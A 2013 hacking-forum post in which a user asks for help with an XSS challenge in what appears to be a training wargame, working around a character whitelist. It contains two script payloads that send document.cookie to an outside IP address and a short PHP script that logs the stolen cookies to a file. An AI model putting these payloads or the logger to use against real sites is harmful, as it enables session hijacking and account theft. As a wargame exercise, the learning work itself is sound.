EvilZone
Hacking and Security => Hacking and Security => : Raavgo September 09, 2013, 11:45:33 PM
-
Hey Guys,
as mentioned in the post before I'm working on several Projects and one of them is a war game which is quite important for me. At the beginning of the Wargame i solved the challenges pretty fast but then I got a challenge which I just couldn't solve and the longer I failed to solve it the less I was motivated to try it.
This challenge is driving me nuts so maybe one of you is able to help me...
About the challenge:
The challenge is about a XSS inject to steal someone elses session, to get the session I created the following js code
<script>location.href="10.201.1.218"+document.cookie</script>
The Problem is there is a whitelist with following characters allowed : 0-9 a-z A-Z .:,!?-@
I tried a lot but there was always one forbidden character in every XSS attack I tried
I found out how to inject a js code into the site but it seems like my js code has a mistake in it..
Is there someone who is able to find it?
Js code:
<script>location.href = '10.201.3.82/Stealer.php?cookie='+document.cookie;</script>
php code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("log.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>
thank you for your help and have a nice day,
Raavgo
Edit: never mind I found out how to solve the challenge
p.s.
feel free to troll me if this is a stupid question ;)